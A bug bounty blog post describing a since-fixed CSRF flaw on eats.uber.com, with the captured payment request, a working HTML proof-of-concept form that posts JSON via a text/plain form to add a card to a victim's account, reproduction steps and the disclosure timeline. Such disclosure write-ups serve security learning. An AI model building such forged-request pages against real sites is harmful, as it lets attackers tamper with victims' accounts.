Add Credit Card to Any Uber account Through eats.uber.com(CSRF)

Hi All ,

Company Info :
Uber Technologies Inc. is an American technology company headquartered in San Francisco, California, United States, operating in 633 cities worldwide. It develops, markets and operates the Uber car transportation and food delivery mobile apps. Uber drivers use their own cars, although drivers can rent a car to drive with Uber.

Bug Category and reference links :
Cross Site request forgery(CSRF)
link :https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Technical Details of the Bug :
CSRF takes advantage the fact that most web apps allow attackers to predict all the details of a particular action.
Because browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.
Detection of CSRF flaws is fairly easy via penetration testing or code analysis.


Bug Description : 
It was Last September 2016 when eats.uber.com came in scope. Uber eats is a delivery service which wasn't launched in india. Since I was from India , It was pretty hard to find issues because delivery options weren't there. Still i tried to Book order by entering US location and checkout page came where Credit Card Details were required. When i tried to Add credit card and intercept the request , i noticed that Request was in Json Format and Origin, Referrer and CSRF-token etc. Headers were implemented for CSRF protection . I removed all the Headers and the Request was still working . So i created a HTML POC to add credit card details into any uber account and it was working fine.


Vulnerable Request :
POST /rtapi/payment/v2/payment_profiles/ HTTP/1.1
Host: eats.uber.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-csrf-token: undefined
Content-Type: application/json
Origin: https://eats.uber.com
Referer: https://eats.uber.com/?latLng=25.938877%2C-80.12154859999998&location=Collins+Avenue%2C+Sunny+Isles+Beach%2C+FL%2C+United+States
Content-Length: 229
Cookie: [Cookies]
Connection: keep-alive
{"tokenType":"bank_card","tokenData":{"useCase":"personal","billingCountryIso2":"US","billingZip":"","braintree":{"cardNumber":"","cardCode":"","cardExpirationMonth":"","cardExpirationYear":""}}}
All the headers weren't validating on server side.


HTML POC : 

<html>  
  <form action="https://eats.uber.com/rtapi/payment/v2/payment_profiles" method="POST" enctype="text/plain" >  
  <input name='{"tokenType":"bank_card","tokenData":{"useCase":"personal","billingCountryIso2":"US","billingZip":"","braintree":{"cardNumber":"","cardCode":"","cardExpirationMonth":"","cardExpirationYear":""}}, "ignore_me":"' value='test"}' type='hidden'>  
 <input type=submit>  
</form>  
 </html>  

Steps to reproduce :
1.Send this HTML page to any user.
2.Once user clicks on submit button , New Credit card will be added into users account.




TimeLine : 
August 20th 2016 : Report send to Uber Security Team through Hackerone
August 22th 2016 : Report Triaged by Team
September 8th 2016: Issue was resolved by Uber team and confirmed .
September 13th 2016 : 6000$ Bounty was rewarded .
Note : The bounty was rewarded based on few more reports of CSRF issues in same site which was reported by me .So this was a Combined bounty for them



I would like to Thank to Uber Security team for Fixing this serious issue .
Please feel free to comment if you have any questions regarding this issue.


Thanks !
Vijay Kumar

Comments

Popular posts from this blog

Airbnb : Steal Earning of Airbnb hosts by Adding Bank Account/Payment Method (IDOR)

XSS+CSRF attack in Tagged using Redirect parameter(Open URL Redirection attack Possible)